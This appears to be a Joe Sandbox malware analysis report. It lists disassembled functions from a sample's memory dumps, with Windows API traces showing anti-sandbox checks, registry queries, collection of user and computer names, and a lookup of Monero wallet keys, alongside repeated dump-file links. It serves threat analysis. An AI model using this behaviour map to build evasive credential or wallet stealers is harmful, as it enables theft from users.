Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 91b9ef1e9268ebffc1b8d7853f47a9927164602fe01a8dcff4a7cb7f2c69da7e
Instruction ID: e684060a807a3d1fd3a028ffd98d37868fc2b8a5b1d9f7609be1954875bb26ca
Opcode Fuzzy Hash: 91b9ef1e9268ebffc1b8d7853f47a9927164602fe01a8dcff4a7cb7f2c69da7e
Instruction Fuzzy Hash: 030112B5A4030CBBEB00DBE4DC4AFAEB7B8FB4C709F104559FA15A7281DE705A008B91

Function 009940B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 009940D5
RegOpenKeyExA.KERNEL32(80000001,0157D660,00000000,00020119,?), ref: 009940F4
RegQueryValueExA.ADVAPI32(?,0157DDC8,00000000,00000000,00000000,000000FF), ref: 00994118
RegCloseKey.ADVAPI32(?), ref: 00994122
lstrcat.KERNEL32(?,00000000), ref: 00994147
lstrcat.KERNEL32(?,0157DD68), ref: 0099415B

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: eb0d50a015810f0087ef49439fc85938274067b0c61f19a4f6b21543d3722802
Instruction ID: 1ecee6191c6c25f9779484f0a9540d98030bf6e29827ec87ba68af4c3378a1c5
Opcode Fuzzy Hash: eb0d50a015810f0087ef49439fc85938274067b0c61f19a4f6b21543d3722802
Instruction Fuzzy Hash: E64145B6D1010C6BDB14FBA0EC56FEE737DAB8C304F408558B61A97181EE755B888B92

Function 009969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01570ED0), ref: 009998A1
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01571110), ref: 009998BA
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01570FC0), ref: 009998D2
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01570EE8), ref: 009998EA
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01571128), ref: 00999903
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,015793F8), ref: 0099991B
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,015661C8), ref: 00999933
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,015662A8), ref: 0099994C
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01571020), ref: 00999964
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01571038), ref: 0099997C
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01571050), ref: 00999995
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01570F00), ref: 009999AD
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01566268), ref: 009999C5
Part of subcall function 00999860: GetProcAddress.KERNEL32(76F70000,01571140), ref: 009999DE

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 009811D0: ExitProcess.KERNEL32 ref: 00981211

Part of subcall function 00981160: GetSystemInfo.KERNEL32(?), ref: 0098116A
Part of subcall function 00981160: ExitProcess.KERNEL32 ref: 0098117E

Part of subcall function 00981110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0098112B
Part of subcall function 00981110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00981132
Part of subcall function 00981110: ExitProcess.KERNEL32 ref: 00981143

Part of subcall function 00981220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0098123E
Part of subcall function 00981220: ExitProcess.KERNEL32 ref: 00981294

Part of subcall function 00996770: GetUserDefaultLangID.KERNEL32 ref: 00996774

Part of subcall function 00981190: ExitProcess.KERNEL32 ref: 009811C6

Part of subcall function 00997850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009811B7), ref: 00997880
Part of subcall function 00997850: RtlAllocateHeap.NTDLL(00000000), ref: 00997887
Part of subcall function 00997850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0099789F

Part of subcall function 009978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997910
Part of subcall function 009978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00997917
Part of subcall function 009978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0099792F

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015794E8,?,009A110C,?,00000000,?,009A1110,?,00000000,009A0AEF), ref: 00996ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00996AE8
CloseHandle.KERNEL32(00000000), ref: 00996AF9
Sleep.KERNEL32(00001770), ref: 00996B04
CloseHandle.KERNEL32(?,00000000,?,015794E8,?,009A110C,?,00000000,?,009A1110,?,00000000,009A0AEF), ref: 00996B1A
ExitProcess.KERNEL32 ref: 00996B22

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: 839130db0647d847df4b934ef073f79f0a21c43f0ec222fb86314f6331455223
Instruction ID: 089f8350e740d94e5a2cc67d31308170b2e76c81e69487dd6cf06384de47609f
Opcode Fuzzy Hash: 839130db0647d847df4b934ef073f79f0a21c43f0ec222fb86314f6331455223
Instruction Fuzzy Hash: 4631F671914208ABDF04FBE9DC5ABEE7778EF94740F104528F212A2192EF706905C7E6

Function 009899C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009899EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00989A11
LocalAlloc.KERNEL32(00000040,?), ref: 00989A31
ReadFile.KERNEL32(000000FF,?,00000000,0098148F,00000000), ref: 00989A5A
LocalFree.KERNEL32(0098148F), ref: 00989A90
CloseHandle.KERNEL32(000000FF), ref: 00989A9A

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: d3fc9c4108a1d3d32e99393d0e178eac85b83f848987a9225707c2975dbf6b99
Instruction ID: ba8ea20aaeea626e1baf07b65d2b0e0361132f778bc92b310c75c2e322a2ee19
Opcode Fuzzy Hash: d3fc9c4108a1d3d32e99393d0e178eac85b83f848987a9225707c2975dbf6b99
Instruction Fuzzy Hash: 5F31E5B4A00209EFDB14DF94C985FAE77B9FF48345F148158E912A7390DB78AA41CFA1

Function 00994780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0157DE70), ref: 009947DB

Part of subcall function 00998DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00998E0B

lstrcat.KERNEL32(?,00000000), ref: 00994801
lstrcat.KERNEL32(?,?), ref: 00994820
lstrcat.KERNEL32(?,?), ref: 00994834
lstrcat.KERNEL32(?,0156AB70), ref: 00994847
lstrcat.KERNEL32(?,?), ref: 0099485B
lstrcat.KERNEL32(?,0157D6C0), ref: 0099486F

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 00998D90: GetFileAttributesA.KERNEL32(00000000,?,00981B54,?,?,009A564C,?,?,009A0E1F), ref: 00998D9F

Part of subcall function 00994570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00994580
Part of subcall function 00994570: RtlAllocateHeap.NTDLL(00000000), ref: 00994587
Part of subcall function 00994570: wsprintfA.USER32 ref: 009945A6
Part of subcall function 00994570: FindFirstFileA.KERNEL32(?,?), ref: 009945BD

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 3543491ac8ac47ce2bb7b9d5883cccc431ab3873bfdd4f6cf62525898d09b025
Instruction ID: 15137233ca8658e3c8d9e5005f7702c8a3c004bb5fdbbd6c8bcbd4a399b5d3b3
Opcode Fuzzy Hash: 3543491ac8ac47ce2bb7b9d5883cccc431ab3873bfdd4f6cf62525898d09b025
Instruction Fuzzy Hash: B73151B290021CA7CF14FBB4DC85FEA737CAB98704F404989B35996181EE74A789CB95

Function 6CCAC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CCAC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CCAC969
GetSystemInfo.KERNEL32(?), ref: 6CCAC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CCAC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CCAC9E2

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 3a7c0c3562e571061ec9c6faba7dce015b233afdc69e4bfed631bcffd34f5a3a
Instruction ID: 379bb66b026963ac6ac76b5839a5ec16cbaa1b430ecbffb78db944eec24832cf
Opcode Fuzzy Hash: 3a7c0c3562e571061ec9c6faba7dce015b233afdc69e4bfed631bcffd34f5a3a
Instruction Fuzzy Hash: 3A21F5717012056BEB04AAB8D889BAE72BDFB46300F50011AFA07A7F80EB3198068795

Function 00997E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997E37
RtlAllocateHeap.NTDLL(00000000), ref: 00997E3E
RegOpenKeyExA.KERNEL32(80000002,0156B8F0,00000000,00020119,?), ref: 00997E5E
RegQueryValueExA.KERNEL32(?,0157D780,00000000,00000000,000000FF,000000FF), ref: 00997E7F
RegCloseKey.ADVAPI32(?), ref: 00997E92

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 9105e794a932eaed836de4c06c7b22cf7282c65f5cb4324093e06392c35f2e86
Instruction ID: 9b1e7de5ef4d4b1f2d81602ae610090fc502fbd863ac69abec55d5cca6074e37
Opcode Fuzzy Hash: 9105e794a932eaed836de4c06c7b22cf7282c65f5cb4324093e06392c35f2e86
Instruction Fuzzy Hash: E7118CB1A44209EBDB00CBD9DD49FBBFBB8FB48B04F10411AF605A7290DB7858008BA1

Function 009812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009812B4
RtlAllocateHeap.NTDLL(00000000), ref: 009812BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009812D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009812F5
RegCloseKey.ADVAPI32(?), ref: 009812FF

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
